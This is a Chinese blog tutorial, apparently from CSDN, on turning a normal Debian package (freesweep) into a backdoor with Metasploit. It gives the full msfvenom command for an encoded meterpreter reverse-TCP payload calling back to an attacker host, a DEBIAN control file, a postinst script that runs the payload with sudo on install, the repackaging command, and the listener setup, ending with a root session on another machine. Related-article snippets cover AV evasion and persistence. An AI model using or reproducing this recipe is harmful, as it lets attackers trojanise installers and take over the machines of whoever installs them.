MSF实战制作deb软件包后门

最新推荐文章于 2023-02-05 15:00:29 发布
最新推荐文章于 2023-02-05 15:00:29 发布
阅读量435 收藏 3
点赞数 3
分类专栏: Kali Linux 文章标签: 信息安全 后门 渗透测试 Kali Linux MSF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40228200/article/details/125235401
版权

今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF实战制作deb软件包后门。

免责声明:
本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负!
再次强调:严禁对未授权设备进行渗透测试!

一、deb恶意软件包制作

首先,我们先下载一个正常的deb软件包,执行命令:

apt install --download-only freesweep

其中,–download-only参数的作用是表明该软件包只下载,不安装。
该命令执行结果如下所示:
在这里插入图片描述
在默认情况下,apt命令下载的安装包都在/var/cache/apt/archives/目录下,如下所示:
在这里插入图片描述
之后,我们需要将该deb包解压,执行命令:

dpkg -x freesweep_1.0.2-1_amd64.deb /root/free

该命令可以将free软件包解压到/root目录下,该命令执行结果如下所示:
在这里插入图片描述
之后,我们进入到/root/free/usr/games目录下,执行命令:

msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.136.199 LPORT=4444 -b "\x00" -i 10 -f elf -o ./freesweep_exp

表示生成一个名为freesweep_exp的后门,该命令执行结果如下所示:
在这里插入图片描述
之后,我们在/root/free/目录下,新建一个名为DEBIAN的目录,然后在该目录下新创建一个名为control的文件。在该文件中写入如下内容:

Package:freesweep
Version:1.2.0-2
Section:pzz
Priority:pzz
Architecture:amd64
Maintainer:Ubuntu
Description:********

注:在上述配置中,目录和文件名称不能变动,文件中的内容除了Architecture不能变动外,其余的在保证参数名称争取的情况下,可以随意更改。
之后,我们再新建一个postinst的文件,在该文件下写入如下内容:

#!/bin/bash
sudo chmod 2755 /usr/games/freesweep_exp
sudo /usr/games/freesweep_exp

之后,我们给该文件授予可执行权限,执行命令:

chmod 755 /root/free/DEBIAN/postinst

在上述所有操作全部完成后,我们就设置好了我们的带有后门的deb包了,接下来,我们需要将该deb包再次打包,执行命令:

dpkg-deb --build /root/free

该命令执行结果如下所示:
在这里插入图片描述
这时,在/root/目录下,就会出现名为free.deb的deb软件包,如下所示:
在这里插入图片描述

二、效果检验

在完成恶意软件包的制作后,我们接下来就可以来检验该软件包的效果了。
首先,我们在Kali Linux上,启动exploit/multi/handler模块,设置linux/x64/meterpreter/reverse_tcp的payload,并设置LHOST参数,所有设置如下所示:
在这里插入图片描述
之后,我们执行run,即可开启监听。
我们在其他的设备上,下载并安装该软件包,如下所示:
在这里插入图片描述
此时,我们可以看到Kali Linux的MSF上出现了一个链接,如下所示:
在这里插入图片描述
从上图可知,我们带有后门的deb安装包获得了root权限,我们实战成功!
原创不易,转载请说明出处:https://blog.csdn.net/weixin_40228200

永远是少年啊
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
2022-渗透测试-制作恶意deb软件包来触发后门
保持微笑的博客
01-19 2169
目录 1.下载软件包 2.解压软件包 小知识1:kali更新或安装包的目录 小知识2:kali解压或安装操作 3.生成恶意代码到软件包源文件中 4.创建软件包信息目录 5.重新生成一个软件包 6 将deb提供下载 7 启动msfconsole 8.配置监听 10 目标机下载并安装带木马的deb软件 11.目标机安装软件 12 监控端获取到session 1.下载软件包 kali安装软件包 apt install 软件名称 kali下载软件包 apt --down..
制作恶意deb软件包linux系统触发后门
xiao_he0123的博客
02-27 2153
文章目录前言一、kali二、操作步骤1.下载一个正常的软件包2.将软件包转移到root目录下3.将安装包解压到root目录中解压为free(文件名)4.制作后门放入free文件中三.总结 前言 通过kali系统中的msf软件包中植入后门制作deb恶意软件包linux系统进行shell获取 提示:以下是本篇文章正文内容,下面案例可供参考 一、kali 示例:Kali Linux预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripper,以及Aircrack-ng.用户
在Ubuntu本地下载软件包并递归下载其所有依赖包
zgp210317的博客
10-02 2万+
由于最近需要在无互联网环境的ubuntu上安装软件包,而往往每个软件包都需要很多依赖项,依赖项还有各自的依赖项,手动查找下载非常麻烦。 在一些早期的ubuntu上连C编译器也没有预装,需要安装gcc等编译器才能进行下一步工作。 因此需要下载软件包及其所有递归的依赖项才能在无互联网的机子上顺利安装软件包。 有两种方法可以在 Ubuntu 及其衍生发行版中本地下载具有依赖项的软件包。 方法1: 要下载软件包而不安装它们,只需运行 $ sudo apt-get install --download-only &l
MSF给正常程序添加后门
永远是少年
06-10 1545
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF给正常程序添加后门。 一、后门制作 二、监听开启 三、效果检验 (一)软件查杀测评 (二)软件效果检验
Linux下载离线安装包
m0_46665077的博客
04-21 2765
CentOS、RedHat、Ubuntu、Kali下载离线安装包
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目...
msf windows版
09-22
msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版
linux系统安装msf的过程详解
09-14
Linux系统中安装Metasploit Framework(MSF)是一个重要的步骤,对于网络安全研究者和渗透测试人员来说,这是必备的工具。以下是一个详尽的安装教程,特别针对阿里云Linux系统。 首先,确保你的系统已经更新到...
解读MSF团队管理的秘密
03-03
火龙果软件工程技术中心 俗话说“三个臭皮匠胜过诸葛亮”,但实际工作中出现的常常是“三个诸葛亮不如一个臭皮匠”。您的软件开发团队有这样的一些问题吗?日程安排一团糟、功能不合适、到处都是系统错误,而原因...
MSF技术总结
05-07
MSF 技术总结 MSF(Metasploit Framework)是一款功能强大且广泛使用的渗透测试工具,提供了丰富的命令和插件,帮助渗透测试者快速发现和利用系统漏洞。本文将对 MSF 的使用和高级用法进行总结。 一、MSF 架构 ...
msf生成免杀木马
qq_56426046的博客
09-08 5481
1.修改特征码免杀的最基本思想就是破坏特征,这个特征有可能是特征码,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。(特征码:能识别一个程序是病毒的一段不大于64字节的特征串)就目前的反病毒技术来讲,更改特征码从而达到免杀的效果事实上包含着两种方式。一种是改特征码,这也是免杀的最初方法。例如一个文件在某一个地址内有“灰鸽子上线成功!”这么一句话,表明它就是木马,只要将相应地址内的那句话改成别的就可以了,如果是无关痛痒的,直接将其删掉也未尝不可。
利用deb包-0day-java环境-安卓客户端进行渗透
Q先生
07-20 1082
利用deb包-0day-java环境-安卓客户端进行渗透 1 制作恶意deb软件包来触发后门 制作恶意deb软件来触发后门一共分3步 下载软件包 解包 植入后门 1.1 下载软件包 apt install --download-only freesweep cp /var/cache/apt/archives/freesweep_1.0.1-1_amd64.deb ./ 1.2 解压包 dpkg -x freesweep_1.0.1-1_amd64.deb free cd free 1.
ubuntu系统只下载某个软件包而不安装它的命令
qq_17576885的博客
02-05 4347
ubuntu系统下载某个软件包而不安装,下载软件包与依赖包而不安装 命令。包含ftpd、 openbsd-inetd、 tcpd三个deb包。下载软件包到当前shell运行的目录里,只有一个ftpd包。
MSF的使用教程
热门推荐
hackzkaq的博客
10-18 3万+
公众号:白帽子左一 MSF简介 Metasploit(MSF)是一个免费的、可下载的框架 它本身附带数百个已知软件漏洞,是一款专业级漏洞攻击工具。 当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了,仿佛一夜之间,任何人都可以成为黑客。 因为只要掌握MSF的使用方法,每个人都可以使用MSF来攻击那些未打过补丁或者刚刚打过补丁的漏洞。 也因此软件厂商再也不能推迟发布针对已公布漏洞的补丁了,因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所.
MSF生成后门木马
一醉一休的博客
11-19 2382
为了方便平时使用,记录一下操作命令
yum install --downloadonly 下载依赖包到本地 但不安装
11-15 875
如果手动去一个个找依赖是很困难的,即便已经知道名字、版本,下面就依赖系统自带的命令完成该步骤 以java为例,其他安装包只要替换包名 yum install --downloadonly --downloaddir=/home/java java 转载于:https://www.cnblogs.com/pangguoming/p/9961482.html...
msf利用ms17-010永恒之蓝获取win7 shell并留后门
weixin_43102772的博客
02-15 4389
思路: 1.判断靶机是否存在ms17-010漏洞 2.攻击靶机获得shell 3.创建用户账号(知道原账号、密码则可省了,直接用原用户账号代替) 4.留后门 实验开始: 一:判断靶机是否存在ms17-010漏洞 sf5 > use exploit/windows/smb/ms17_010 二:攻击靶机获得shell 1.调用ns17-010永恒之蓝 2.设置payload 3.设置lho...
Windows留后门--教程(二)——Windows计划任务后门
W小哥
03-15 4446
一、Windows计划任务后门介绍 计划任务是经常被攻击者拿来利用的控制点,计划任务可以让目标主机在特定的时间执行我们预先准备的后门程序从而帮助我们进行权限维持。 二、Windows计划任务后门-教程 前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器administrator权限 环境: windows Server2012 IP: 192.168.226.128 2.1 利用MSF生成一个EXE类型的后门木马 2.2 创建计划任务 2.3 监听返回的shell 三、Win
MSF针对FTP的后门攻击危害
永远是少年
06-07 808
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF针对FTP的后门攻击危害。 一、模块使用 二、参数设定与执行 三、结果查看
msf上线Windows实战
最新发布
08-21
在f上线Windows实战中,可以使用msfvenom工具一个exe木马文件。生成木马的命令是"msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=监听端口 -f exe > 文件名.exe"。其中,LHOST是攻击机的IP地址,LPORT是监听的端口号。生成的exe文件可以通过各种方式传递给目标Windows系统进行实战操作。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [msf windows版](https://download.csdn.net/download/baidu_35488871/12879062)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [Windows网络服务渗透测试实战-MSF恶意程序利用](https://blog.csdn.net/c_lanxiaofang/article/details/124879375)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [MSF上线](https://blog.csdn.net/weixin_51151498/article/details/129542091)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

永远是少年啊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值